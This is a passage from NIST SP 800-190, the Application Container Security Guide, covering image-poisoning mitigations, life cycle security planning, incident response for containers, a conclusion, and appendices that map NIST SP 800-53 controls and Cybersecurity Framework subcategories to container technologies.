project and uses images provided by that project’s web site, the attacker may seek to craft 
malicious versions of these images for use in an attack.  
Relevant mitigations include:  
1. Ensuring that only vetted, tested, validated, and digitally signed images are allowed to be 
uploaded to an organization’s registries.  
2. Ensuring that only trusted images are allowed to run, which will prevent images from 
external, unvetted sources from being used. 
3. Automatically scanning images for vulnerabilities and malware, which may detect 
malicious code such as ro otkits embedded within an image . 
4. Implement ing runtime controls that limit the container's ability to abuse resources, 
escalate privileges, and run executables. 
5. Using c ontainer -level net work segmentation to limit the “bl ast radius” of w hat the 
poisoned image might do. 
6. Validating a conta iner runtime operates following  least -privil ege and least -access 
principles.  
7. Building a threat profile of the container's runtime. This includes, but is not limited to, 
processes, network calls, and filesystem changes.  
8. Validating the integrity of images before runtime by leveraging hashes and digital 
signatures.  
9. Restrict images from being run based on rules establishing acceptable vulnerability 
severity levels. For example, prevent images w ith vulnerabilities that have  a Moderate  or 
higher CVSS rating from being run.  
 
 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
32 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 6 Container Technology Life Cycle Security Considerations  
It is critically important to carefully plan before installing, configuring, and deploying container 
technolog ies. This helps ensure that the container environment is as secure as possible and is in 
compliance with all relevant organizational policies, external regulations, and other 
requirements.  
There is a great deal of similarity in the planning and implementation recommendations for 
container technologies  and virtualization solutions. Section 5 of NIST SP 800- 125 [1] already 
contains a full set of recommendations for virtualization solutions. Instead of repeating all those 
recomm endations here, this section points readers to that document and states that, besides the 
exceptions listed below, organizations should apply all the NIST SP 800- 125 Section 5 
recommendations in a container technology context. For example, instead of creat ing a 
virtualization security policy, create a container technology security policy. 
This section of the document lists exceptions and additions to the NIST SP 800- 125 Section 5 
recommendations , grouped by the corresponding phase in the planning and implem entation life 
cycle.  
6.1 Initiation Phase 
Organizations should consider how other security policies may be affected by containers and 
adjust these policies as needed to take containers  into consideration. For example, policies for 
incident response (especially  forensics) and vulnerability management may need to be adjusted 
to take into account the special requirements of containers.  
The introduction of container technologies might disrupt  the existing culture and software 
development methodologies within the or ganization. To take full advantage of the benefits 
containers can provide, the organization’ s processes should be tailored to support this new way 
of developing, running, and supporting apps. Traditional development practices, patching 
techniques , and syst em upgrade processes might not directly apply to a containerized 
environment , and it is important that the employees within the organization are willing to adapt 
to a new model. New processes can consider and address any potential culture shock that is 
introduced by the technology shift. Education and training can be offered to anyone involved in 
the software development lifecycle to allow people to become comfortable with  the new way to 
build, ship, and run apps. 
6.2 Planning and Design Phase 
The primary conta iner-specific consideration for the planning and design phase is forensics. 
Because containers mostly build on components already present in OSs , the tools and techniques 
for performing forensics in a containerized environment are mostly an evolution of existing 
practices. The immutable nature of containers and images can actually improve forensic 
capabilities because the demarcation between what an image should do and what actually 
occurred during an incident is clearer. For example, if a container launche d to run a web server 
suddenly starts a mail relay, it  is very clear that the new process was not part of the origin al 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
33 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 image used to create the container. On traditional platforms, with less separation between the OS  
and apps, making this differentiation can be much more difficult.  
Organizations that are familiar with process, memory, and disk incident response activities will 
find them largely similar when working with containers. However, there are some differences to 
keep in mind as well.  
Containers typically use a layered file system that  is virtualized from the host OS . Directly 
examining paths on the hosts typically only reveals the outer boundary of these layers, not the 
files and data within them. Thus, when responding to incidents in containerized environments, 
users should identify  the specific storage provider in use and understand how to properly 
examine its contents offline.  
Containers are typically connected to each other using virtualized overlay networks. These 
overlay networks frequently use  encapsulation and encryption to allow the traffic to be routed 
over existing networks securely. However, this means that when investigating incidents on 
container networks, particularly when doing any live packet analysis, the tools used must be 
aware of these virtualized networks and understand how to extract the embedded IP frames from 
within them for parsing with existing tools.  
Process and memory activity within containers is largely similar to that which would be observed 
within traditional apps, but with different parent processe s. For example, container runtimes may 
spawn all processes within containers in a nested fashion in which the runtime is the top -level 
process with first -level descendants per container and second -level descendants for each pr ocess 
within the container.  For example: 
├─containerd─┬── ─┬───[container1─┬─bash] 
│            │   │               └─8*[{thread}]] 
│            │   ├─container2────┬─start.sh─┬─mongod───22*[{mongod}] 
│            │   │               │          └─node─┬─4*[{V8 WorkerThread}] 
│            │   │               │                 └─5*[{node}] 
│            │   │               └─8*[{thread}] 
│            │   ├─container3────┬─mysqld───28*[{mysqld}] 
│            │   │               └─8*[{thread}] 
6.3 Implementation Phase 
After the container technology has been designed, the next step is to implement and test a 
prototype of the design before putting the solution into production. Be aware that container 
technolog ies do not offer the types of introspection capabilities  that VM technologies do. 
NIST SP 800 -125 [1] cites several aspects of virtualization technologies that should be ev aluated 
before production deployment, including authentication, connectivity and networking, app 
functionality, management, performance, and the security of the technology itself. In addition to 
those , it is important to also evaluate the container technol ogy’s isolation capabilities. Ensure 
that processes within the container can access all resources they are permitted to and cannot view 
or access any other resources.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
34 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Implementation may require new security tools that are specifically focused on containers and 
cloud- native apps and that have visibility into their operations that traditional tools lack. Finally, 
deployment may also include  altering the configuration of existing  security controls and 
technologies, such as security event logging, network management, code repositories, and 
authentication server s both to work with containers directly and to integrate with these new 
container security tools.  
When the prototype evaluation has been completed and the container technology is ready for 
production usage , containers should initially be used for a small number of apps. Problems that 
occur are likely to affect multiple apps, so it is helpful to identify these problems early on so they 
can be addressed before further deployment.  A phased deployment also provides time for 
developers and IT staff (e.g., system administrators, help desk) to be trained on its usage and 
support.  
6.4 Operations and Maintenance Phase 
Operational processes that are particularly important for maintaining the security  of container 
technolog ies, and thus should be performed regularly, include updating all images and 
distributing those updated images to containers to take the place of older images. Other security 
best practices, such as performing vulnerability management and updates for other supporting 
layers like hosts and orchestrators, are also key ongoing operational tasks. Container security and 
monitoring tools should similarly be integrated  with existing security information and event 
management (SIEM) tools to ensure container -related events flow through the same tools and 
processes used to provide security throughout the rest of the environment. 
If and when security incidents occur within a containerized environment , organizations should be 
prepared to respond with processes and tools that are optimized for the unique aspects of 
containers. The core guidance outlined in NIST SP 800- 61, Computer Security Incident 
Handling Guide  [28], is very much applicable for containerized environments as well. However, 
organizations adopting containers should ensure they enhance their responses for some of the 
unique aspec ts of container security.  
• Because containerized apps may be run by a different team than the traditional operations 
team, organizations should ensure that whatever teams are responsible for container 
operations are brought into the incident response plan a nd understand their role in it.  
• As discussed throughout this document, the ephemeral and automated nature of container 
management may not be aligned with the asset management policies and tools an 
organization has traditionally used.  Incident response tea ms must be able to know the 
roles, owners, and sensitivity levels of containers, and be able to integrate this data into 
their process. 
• Clear procedures should be defined to respond to container related incidents.  For 
example, if a particular image is bei ng exploited, but that image is in use across hundreds 
of containers, the response team may need to shut  down all of these containers to stop the 
attack.  While single vulnerabilities have long been able to cause problems across many 
systems, with containers, the response may require rebuilding and redeploying a new 
image widely, rather than installing a patch to existing systems.  This change in response 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
35 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 may involve different teams and approvals and should be understood and practiced ahead 
of time.  
• As discussed previously, logging and other forensic data may be stored differently in a 
containerized environment.  Incident response teams should be familiar with the different 
tools and techniques required to gather data and have documented processes specifical ly 
for these environments. 
6.5 Disposition Phase 
The ability for containers to be deployed and destroyed automatically based on the needs of an 
app allows for highly efficient systems but can also introduce some challenges for records 
retention, forensic, and event data requirements. Organizations should make sure that appropriate 
mechanisms are in place to satisfy their data retention policies. Example s of issues that should be 
addressed are how container s and images should be  destroyed, what data should be  extracted 
from a container before disposal  and how that data extraction should be performed, how 
cryptographic keys used by a container should be  revoked or deleted, etc.  
Data stores and media that support the containerized environment should be included in any 
disposal plans developed by the organization.  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
36 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 7 Conclusion 
Containers represent a transformational change in the way apps are built and run . They do not  
necessitate dramatically new  security best practices ; on the contrary, most  important aspects of 
container security are refinements of well -established techniques and principles . This document 
has update d and expanded general security recommendations to take the risks particular to 
container technologies into account.  
This docume nt has already discussed  some of the differences between  securing containers and 
securing the same apps in VMs. It  is useful to summarize the guidance in th is document around 
those points.  
In container environments t here are m any more entities, so security  processes and tools must be 
able to scale accordingly. Scale does not just mean the total number of objects supported in a 
database, but also how effectively and autonomously policy can be managed. Many 
organizations struggle with the burden of managing s ecurity across hundreds of VMs. As 
container -centric architectures become the norm and these organizations are responsible for 
thousands or tens of thousands of containers , their security practices should emphasize 
automation and efficiency to keep up.  
With containers there is a m uch higher rate of change, moving from updating an app a few times 
a year to a few times a week or even a day . What used to be acceptable to do manually no longer 
is. Automation is  not just important to deal with the net number of entities, but also with how 
frequently those entities change. Being able to centrally express policy and have software 
manage enforcement of it across the environment is vital. Organizations that adopt containers 
should be prepared to manage this frequency  of change . This may require fundamentally new 
operational practices and organizational evolution. 
The use of containers shifts much of the responsibility for security to developer s, so 
organizations should ensure their developers have all the information, skills, and tools  they need 
to make sound decisions. Also, security teams should be enabled to actively enforce quality 
throughout the development cycle. Organizations that are successful at this transition gain 
security benefit in being able to respond t o vulnerabilities faster and with less operational burden 
than ever before. 
Security must be as portable as the containers themselves, so organizations should adopt 
techniques and tools that are open and work across platforms and environments. Many 
organiz ations will see developers build in one environment, test in another, and deploy in a third, 
so having consistency in assessment and enforcement across these is key. Portability is also not 
just environmental but also temporal . Continuous integration and deployment practices erode the 
traditional walls between phases of the development and deployment cycle,  so organizations 
need to ensure consistent , automated security practices across creation of the image, storage of 
the image in registries, and running o f the images in containers.  
Organizations that navigate these changes can begin to leverage containers to actually improve 
their overall security. The immutability and declarative nature of containers enables 
organizations to begin realizing the vision of more automated, app- centric security that requires 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
37 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 minimal manual involvement and that updates itself as the apps change. Containers are an 
enabling capability in organizations moving from reactive, manual, high- cost security models to 
those that enable be tter scale and efficiency , thus lowering risk. 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
38 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Appendix A —NIST Resources for Securing Non-Core Components 
This appendix lists NIST resources for securing non -core container technology components , 
including developer systems, testing and accreditation systems , administrator systems, and host 
hardware and virtual machine managers. Many more resources are available from other 
organizations. 
Table 1: NIST Resources for Securing Non -Core Components  
Resource Name and URI  Applicability  
SP 80 0-40 Revision 3, Guide to Enterprise Patch Management Technologies  
https://doi.org/10.6028/NIST.SP.800-40r3   All IT products and systems  
SP 800-46 Revision 2, Guide to Enterprise Telework, Remote Access, and Bring 
Your Own Device (BYOD) Security 
https://doi.org/10.6028/NIST.SP.800-46r2   Client operating systems, 
client apps  
SP 800-53 Revision 4, Security and Privacy Controls for Federal Information 
Systems and Organizations  
https://doi.org/10.6028/NIST.SP.800-53r4   All IT products and systems  
SP 800-70 Revision 3, National Checklist Program for IT Products: Guidelines for 
Checklist  Users and Developers  
https://doi.org/10.6028/NIST.SP.800-70r3   Server operating systems, 
client operating systems, 
server apps, client apps  
SP 800-83 Revision 1, Guide to Malware Incident Preventio n and Handling for 
Desktops and Laptops  
https://doi.org/10.6028/NIST.SP.800-83r1   Client operating systems, 
client apps  
SP 800-123, Guide to General Server Security  
https://doi.org/10.6028/NIST.SP.800-123   Servers  
SP 800-124 Revision 1, Guidelines for Managing the Security of Mobile Devices in 
the Enterprise  
https://doi.org/10.6028/NIST .SP.800-124r1   Mobile devices  
SP 800-125, Guide to Security for Full Virtualization Technologies 
https://doi.org/10.6028/NIST.SP.800-125   Hypervisors and virtual 
machines  
SP 800-125A, Security Recommendations for Hypervisor Deployment (Second 
Draft) https://csrc.nist.gov/publications/detail/sp/800- 125A/draft    Hypervisors and virtual 
machines  
SP 800-125B, Secur e Virtual Network Configuration for Virtual Machine (VM) 
Protection  
https://doi.org/10.6028/NIST.SP.800-125B   Hypervisors and virtual 
machines  
SP 800-147, BIOS Protection Guidelines  
https://doi.org/10.6028/NIST.SP.800-147   Client hardware 
SP 800-155, BIOS Integrity Measurement Guidelines  
https://csrc.nist.gov/publications/detail/sp/800-155/draft   Client hardware 
SP 800-164, Guidelines on Hardware-Rooted Security in Mobile Devices  
https://csrc.nist.gov/publications/ detail/sp/800-164/draft   Mobile devices  
 
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
39 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Appendix B —NIST SP 800 -53 and NIST Cybersecurity Framework Security Controls 
Related to Container Technologies  
The security controls from NIST SP 800- 53 Revision 4 [29 ] that are most important for container 
technologies are listed in Table 2.  
Table 2: Security Controls from NIST SP 800 -53 for Container Technology Security 
NIST SP 800 -53 Control  Related Controls  References  
AC-2, Account 
Management  AC-3, AC -4, AC -5, AC -6, AC -10, AC -17, AC -19, AC -20, 
AU-9, IA -2, IA -4, IA-5, IA -8, CM -5, CM -6, CM -11, MA -3, 
MA-4, MA -5, PL -4, SC -13  
AC-3, Access Enforcement  AC-2, AC -4, AC -5, AC -6, AC -16, AC -17, AC -18, AC -19, 
AC-20, AC -21, AC - 22, AU-9, CM -5, CM -6, CM -11, MA -3, 
MA-4, MA -5, PE -3  
AC-4, Information Flow 
Enforcement  AC-3, AC -17, AC -19, AC -21, CM -6, CM -7, SA -8, SC -2, 
SC-5, SC -7, SC -18  
AC-6, Least Privilege  AC-2, AC -3, AC -5, CM -6, CM -7, PL-2   
AC-17, Remote Access  AC-2, AC -3, AC -18, AC-19, AC -20, CA -3, CA -7, CM -8, 
IA-2, IA -3, IA -8, MA -4, PE -17, PL-4, SC -10, SI -4 NIST  SPs 800-46,  800-77, 
800-113, 800-114,  800-
121 
AT-3, Role-Based Security 
Training  AT-2, AT -4, PL -4, PS -7, SA -3, SA -12, SA -16 C.F.R.  Part 5 Subpart  C 
(5C.F.R.930.301);  NIST  
SPs 800-16,  800- 50 
AU-2, Audit Events  AC-6, AC -17, AU -3, AU -12, MA -4, MP -2, MP -4, SI -4 NIST SP 800 -92; 
https://idmanagement.gov/   
AU-5, Response to Audit 
Processing Failures  AU-4, SI -12  
AU-6, Audit Review, 
Analysis, and Reporting  AC-2, AC -3, AC -6, AC -17, AT -3, AU -7, AU -16, CA -7, CM -
5, CM -10, CM -11, IA -3, IA -5, IR -5, IR -6, MA -4, MP -4, PE -
3, PE -6, PE -14, PE -16, RA -5, SC -7, SC -18, SC -19, SI -3, 
SI-4, SI -7  
AU-8, Time Stamps  AU-3, AU -12  
AU-9, Protection of Audit 
Information  AC-3, AC -6, MP -2, MP -4, PE -2, PE -3, PE -6  
AU-12, Audit Generation  AC-3, AU -2, AU -3, AU -6, AU -7  
CA-9, Internal System 
Connections  AC-3, AC -4, AC -18, AC -19, AU -2, AU -12, CA - 7, CM -2, 
IA-3, SC -7, SI-4  
CM-2, Baseline 
Configuration  CM-3, CM -6, CM -8, CM -9, SA -10, PM -5, PM -7 NIST SP 800 -128 
CM-3, Configuration 
Change Control  CA-7, CM -2, CM -4, CM -5, CM -6, CM -9, SA -10, SI - 2, SI-
12 NIST SP 800 -128 
CM-4, Security Impact 
Analysis  CA-2, CA -7, CM -3, CM -9, SA -4, SA -5, SA -10, SI -2 NIST SP 800 -128 
CM-5, Access Restrictions 
for Change  AC-3, AC -6, PE -3  
CM-6, Configuration 
Settings  AC-19, CM -2, CM -3, CM -7, SI -4 OMB Memoranda 07- 11, 
07-18, 08-22; NIST SPs 
800-70, 800-128; 
https://nvd.nist.gov ; 
https://checklists.nist.gov ; 
https://www.nsa.gov   
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
40 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 NIST SP 800 -53 Control  Related Controls  References  
CM-7, Least Functionality  AC-6, CM -2, RA -5, SA -5, SC -7 DoD Instruction 8551.01  
CM-9, Configuration 
Management Plan  CM-2, CM -3, CM-4, CM -5, CM -8, SA -10 NIST SP 800 -128 
CP-2, Contingency Plan  AC-14, CP -6, CP -7, CP -8, CP -9, CP -10, IR -4, IR -8, MP -
2, MP -4, MP -5, PM -8, PM -11 Federal Continuity 
Directive 1; NIST SP 800 -
34 
CP-9, Information System 
Backup  CP-2, CP - 6, MP -4, MP -5, SC -13 NIST SP 800 -34 
CP-10, Information System 
Recovery and 
Reconstitution  CA-2, CA -6, CA -7, CP -2, CP -6, CP -7, CP -9, SC -24 Federal Continuity 
Directive 1; NIST SP 800 -
34 
IA-2, Identification and 
Authentication 
(Organizational Users)  AC-2, AC -3, AC -14, AC -17, AC-18, IA -4, IA -5, IA -8 HSPD -12; OMB  
Memoranda 04-04,  06-16,  
11-11;  FIPS 201; NIST 
SPs 800-63, 800-73, 800-
76, 800- 78; FICAM 
Roadmap and 
Implementation Guidance; 
https://idmanagement.gov/   
IA-4, Identifier 
Managem ent AC-2, IA -2, IA -3, IA-5, IA -8, SC -37 FIPS 201; NIST SPs 800 -
73, 800- 76, 800-78  
IA-5, Authenticator 
Management  AC-2, AC -3, AC -6, CM -6, IA -2, IA -4, IA -8, PL -4, PS -5, 
PS-6, SC -12, SC -13, SC -17, SC -28 OMB Memoranda 04-04, 
11-11;  FIPS 201; NIST 
SPs 800-63, 800-73, 800-
76, 800- 78; FICAM 
Roadmap and 
Implementation Guidance; 
https://idmanagement.gov/  
IR-1, Incident Response 
Policy and Procedures  PM-9  NIST  SPs 800-12,  800-61, 
800-83, 800-100 
IR-4, Incident Handling  AU-6, CM -6, CP -2, CP -4, IR -2, IR -3, IR -8, PE -6, SC -5, 
SC-7, SI -3, SI -4, SI-7 EO 13587; NIST SP 800-
61 
MA-2, Controlled 
Maintenance  CM-3, CM -4, MA -4, MP -6, PE -16, SA -12, SI -2  
MA-4, Nonlocal 
Maintenance  AC- 2, AC -3, AC -6, AC -17, AU -2, AU -3, IA -2, IA -4, IA -5, 
IA-8, MA -2, MA -5, MP -6, PL-2, SC -7, SC -10, SC -17 FIPS 140-2, 197, 201; 
NIST SPs 800 -63, 800- 88; 
CNSS Policy 15  
PL-2, System Security 
Plan AC-2, AC -6, AC -14, AC -17, AC -20, CA -2, CA -3, CA -7, 
CM-9, CP -2, IR -8, MA -4, MA -5, MP -2, MP -4, MP -5, PL-7, 
PM-1, PM-7, PM -8, PM -9, PM -11, SA -5, SA -17 NIST SP 800 -18 
PL-4, Rules of Behavior  AC-2, AC -6, AC -8, AC -9, AC -17, AC -18, AC -19, AC -20, 
AT-2, AT -3, CM -11, IA -2, IA -4, IA-5, MP -7, PS -6, PS -8, 
SA-5  NIST SP 800 -18 
RA-2, Security 
Categorization  CM-8, MP -4, RA -3, SC -7 FIPS 199; NIST SPs 800 -
30, 800- 39, 800-60  
RA-3, Risk Assessment  RA-2, PM -9 OMB Memorandum 04-
04; NIST SPs 800- 30, 
800-39; 
https://idmanagement.gov/   
SA-10, Developer 
Configuration 
Management  CM-3, CM -4, CM -9, S A-12, SI -2 NIST SP 800 -128 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
41 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 NIST SP 800 -53 Control  Related Controls  References  
SA-11, Developer Security 
Testing and Evaluation  CA-2, CM -4, SA -3, SA -4, SA -5, SI -2 ISO/IEC 15408; NIST SP 
800-53A; 
https://nvd.nist.gov ; 
http://cwe.mitre.org ; 
http://cve.mitre.org ; 
http://capec.mitre.org   
SA-15, Development 
Process, Standards, and 
Tools  SA-3, SA -8  
SA-19, Component 
Authenticity  PE-3, SA -12, SI -7  
SC-2, Application 
Partitioning  SA-4, SA -8, SC -3  
SC-4, Information in 
Shared Resources  AC-3, AC -4, MP -6  
SC-6, Resource 
Availability    
SC-8, Transmission 
Confidentiality and 
Integrity  AC-17, PE -4 FIPS 140-2,  197; NIST  
SPs 800-52,  800-77,  800-
81, 800-113; CNSS Policy 
15; NSTISSI No. 7003  
SI-2, Flaw Remediation  CA-2, CA -7, CM -3, CM -5, CM -8, MA -2, IR -4, RA -5, SA -
10, SA -11, SI -11 NIST  SPs 800-40,  800-
128 
SI-4, Information System 
Monitoring  AC-3, AC -4, AC -8, AC -17, AU -2, AU -6, AU -7, AU -9, AU -
12, CA-7, IR -4, PE -3, RA -5, SC -7, SC -26, SC -35, SI -3, 
SI-7 NIST SPs 800 -61, 800- 83, 
800-92, 800-137 
SI-7, Software, Firmware, 
and Information Integrity  SA-12, SC -8, SC -13, SI -3 NIST SPs 800 -147, 800-
155 
 
The list below details the NIST Cybersecurity Framework [30 ] subcategories that are most 
important for container technology security.  
• Identify: Asset Management  
o ID.AM -3: Organizational communication and data flows are mapped  
o ID.AM -5: Resources (e.g., hardware, devices, data, and software) are prioritized 
based on their classification, criticality, and business value  
• Identify: Risk Assessment  
o ID.RA- 1: Asset vulnerabilities are identified and documented  
o ID.RA- 3: Threats, both internal and external, are identified and documented  
o ID.RA- 4: Potentia l business impacts and likelihoods are identified  
o ID.RA- 5: Threats, vulnerabilities, likelihoods, and impacts are used to determine risk  
o ID.RA- 6: Risk responses are identified and prioritized  
• Protect: Access Control  
o PR.AC- 1: Identities and credentials are managed for authorized devices and users  
o PR.AC- 2: Physical access to assets is managed and protected  
o PR.AC- 3: Remote access is managed  
o PR.AC- 4: Access permissions are managed, incorporating the principles of least 
privilege and separation of duties  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
42 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • Protect : Awareness and Training  
o PR.AT -2: Privileged users understand roles & responsibilities  
o PR.AT -5: Physical and information security personnel understand roles & 
responsibilities  
• Protect: Data Security  
o PR.DS -2: Data -in-transit is protected  
o PR.DS -4: Adequate capacity to ensure availability is maintained  
o PR.DS -5: Protections against data leaks are implemented  
o PR.DS -6: Integrity checking mechanisms are used to verify software, firmware, and 
information integrity  
• Protect: Information Protection Processes and Procedures 
o PR.IP -1: A baseline configuration of information technology/industrial control 
systems is created and maintained  
o PR.IP -3: Configuration change control processes are in place  
o PR.IP -6: Data is destroyed according to policy  
o PR.IP -9: Response plans (Incident Response and Business Continuity) and recovery 
plans (Incident Recovery and Disaster Recovery) are in place and managed  
o PR.IP -12: A vulnerability management plan is developed and implemented 
• Protect: Maintenance  
o PR.MA- 1: Maintenance and repair of  organizational assets is performed and logged 
in a timely manner, with approved and controlled tools  
o PR.MA- 2: Remote maintenance of organizational assets is approved, logged, and 
performed in a manner that prevents unauthorized access  
• Protect: Protective Technology 
o PR.PT- 1: Audit/log records are determined, documented, implemented, and reviewed 
in accordance with policy 
o PR.PT- 3: Access to systems and assets is controlled, incorporating the principle of 
least functionality  
• Detect: Anomalies and Events 
o DE.AE -2: Detected events are analyzed to understand attack targets and methods  
• Detect: Security Continuous Monitoring  
o DE.CM -1: The network is monitored to detect potential cybersecurity events  
o DE.CM -7: Monitoring for unauthorized personnel, connections, devices , and software 
is performed  
• Respond: Response Planning  
o RS.RP -1: Response plan is executed during or after an event  
• Respond: Analysis  
o RS.AN- 1: Notifications from detection systems are investigated  
o RS.AN- 3: Forensics are performed  
• Respond: Mitigation  
o RS.MI -1: Incidents are contained  
o RS.MI -2: Incidents are mitigated  
o RS.MI -3: Newly identified vulnerabilities are mitigated or documented as accepted 
risks  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
43 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • Recover: Recovery Planning  
o RC.RP -1: Recovery plan is executed during or after an event  
 
Table 3 lists the security controls from NIST SP 800 -53 Revision 4 [29 ] that can be 
accomplished partially or completely by using container technologies. The rightmost column 
lists the sections of this document that map to each NIST SP 800- 53 control.  
Table 3: NIST SP 800 -53 Controls Supported by Container Technologies  
NIST SP 800 -53 
Control  Container Technology Relevancy Related Sections of 
This Document  
CM-3, Configuration 
Change Control  Images can be used to help manage change control for apps.  2.1, 2.2, 2.3, 2.4, 4. 1 
SC-2, Application 
Partitioning  Separating user functionality from administrator functionality can 
be accomplished in part by using containers or other virtualization 
technologies so that the functionality is performed in different 
containers.  2 (introduction), 2. 3, 
4.5.2 
SC-3, Security 
Function Isolation  Separating security functions from non-security functions can be 
accomplished in part by using containers or other virtualization 
technologies so that the functions are performed in different 
containers.  2 (introduction), 2. 3, 
4.5.2 
SC-4, Information in 
Shared Resources  Container technologies are designed to restrict each container’s 
access to shared resources so that information cannot 
inadvertently be leaked from one container to another.  2 (introduction), 2.2, 
2.3, 4.4 
SC-6, Resource 
Availability  The maximum resources available for each container can be 
specified, thus protecting the availability of resources by not 
allowing any container to consume excessive resources.  2.2, 2.3  
SC-7, Boundary 
Protection  Boundaries can be established and enforced between containers 
to restrict their communications with each other.  2 (introduction), 2.2, 
2.3, 4.4 
SC-39, Process 
Isolation  Multiple containers can run processes simultaneously on the 
same host, but those processes are isolated from each other.  2 (introduction), 2.1, 
2.2, 2.3, 4. 4 
SI-7, Softw are, 
Firmware, and 
Information Integrity  Unauthorized changes to the contents of images can easily be 
detected and the altered image replaced with a known good copy.  2.3, 4.1, 4.2 
SI-14, Non-
Persistence  Images running within containers are replaced as needed with 
new image versions, so data, files, executables, and other 
information stored within running images is not persistent.  2.1, 2.3, 4. 1 
 
Similar to Table 3, Table 4 lists the NIST Cybersecurity Framework [30 ] subcategories that can 
be accomplished partially or completely by using container technologies . The rightmost column 
lists the sections of this document that map to each Cybersecurity Framework s ubcategory.  
Table 4: NIST Cybersecurity Framework Subcategories Supported by Container Technologies  
Cybersecurity Framework 
Subcategory  Container Technology Relevancy Related Sections 
of This Document  
PR.DS -4: Adequate capacity to ensure 
availability is maintained  The maximum resources available for each 
container can be specified, thus protecting the 
availability of resources by not allowing any 
container to consume excessive resources.  2.2, 2.3  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
44 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Cybersecurity Framework 
Subcategory  Container Technology Relevancy Related Sections 
of This Document  
PR.DS -5: Protections against data 
leaks are implemented  Container technologies  are designed to restrict 
each container’s access to shared resources so 
that information cannot inadvertently be leaked 
from one container to another.  2 (introduction), 2.2, 
2.3, 4.4 
PR.DS -6: Integrity checking 
mechanisms are used to verify 
software, firmware, and information 
integrity  Unauthorized changes to the contents of images 
can easily be detected and the altered image 
replaced with a known good copy.  2.3, 4.1, 4.2 
PR.DS -7: The development and testing 
environment(s) are separate from the 
production environment  Using containers makes it easier to have 
separate development, testing, and production 
environments because the same image can be 
used in all environments without adjustments.  2.1, 2.3 
PR.IP -3: C onfiguration change control 
processes are in place  Images can be used to help manage change 
control for apps . 2.1, 2.2, 2.3, 2.4, 4. 1 
 
Information on these controls and guidelines  on possible implementations can be found in the 
following NIST publications:  
• FIPS 140- 2, Security Requirements for Cryptographic Modules  
• FIPS 197, Advanced Encryption Standard (AES)  
• FIPS 199, Standards for Security Categorization of Federal Information and Information 
Systems  
• FIPS 201- 2, Personal Identity Verification (PIV) of F ederal Employees and Contractors   
• SP 800- 12 Rev. 1, An Introduction to Information Security  
• Draft SP 800- 16 Rev. 1, A R ole-Based Model for Federal Information 
Technology/Cybersecurity Training  
• SP 800- 18 Rev. 1, Guide for Developing Security Plans for Federal Information Systems  
• SP 800- 30 Rev. 1, Guide for Conducting Risk Assessments  
• SP 800- 34 Rev. 1, Contingency Planning Guide for Federal Information Systems  
• SP 800- 39, Managing Information Security Risk: Organization, Mission, and Information 
System View  
• SP 800- 40 Rev. 3, Guide to Enterprise Patch Management Technologies  
• SP 800- 46 Rev. 2, Guide to Enterprise Telework, Remote Access, and Bring Your Own 
Device (BYOD) Security  
• SP 800- 50, Building an Information Technology Security Awareness and Training 
Program  
• SP 800- 52 Rev. 1, Guidelines for the Selection, Configuration, and Use of Transport 
Layer Security (TLS) Implementations  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
45 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • SP 800- 53 Rev. 4, Security and Privacy Controls for Federal Information Systems and 
Organizations    
• SP 800- 53A Rev. 4, Assessing Security and P rivacy Controls in Federal Information 
Systems and Organizations: Building Effective Assessment Plans  
• SP 800- 60 Rev. 1 Vol. 1, Guide for Mapping Types of Information and Information 
Systems to Secu rity Categories  
• SP 800- 61 Rev. 2, Computer Security Incident Handling Guide  
• SP 800- 63 Rev. 3, Digital Identity Guidelines  
• SP 800- 70 Rev. 3, National Checklist Program for IT Products: Guidelines for Checklist 
Users and Developers  
• SP 800- 73-4, Interfaces for Personal  Identity Verification   
• SP 800- 76-2, Biometric Specifications for Personal Identity Verification  
• SP 800- 77, Guide to IPsec VPNs  
• SP 800- 78-4, Cryptographic Algorithms and Key Sizes for Personal Identification 
Verification (PIV)  
• SP 800- 81-2, Secure Domain Name System (DNS) Deployment Guide  
• SP 800- 83 Rev. 1, Guide to Malware Incident Prevention and Handling for Desktops and 
Laptops  
• SP 800- 88 Rev. 1, Guidelines for  Media Sanitization  
• SP 800- 92, Guide to Computer Security Log Management  
• SP 800- 100, Information Security Handbook: A Guide for Managers  
• SP 800- 113, Guide to SSL VPNs  
• SP 800- 114 Rev. 1, User's Guide to Telework and Bring Your Own Device (BYOD) 
Security  
• SP 800- 121 Rev. 2, Guide to Bluetooth Security  
• SP 800- 128, Guide for Security -Focused Configuration Management of Information 
Systems  
• SP 800- 137, Information Security Continuous Monitoring (ISCM) for Federal 
Information Systems and Organizations  
• SP 800- 147, BIOS Protection Guidelines  
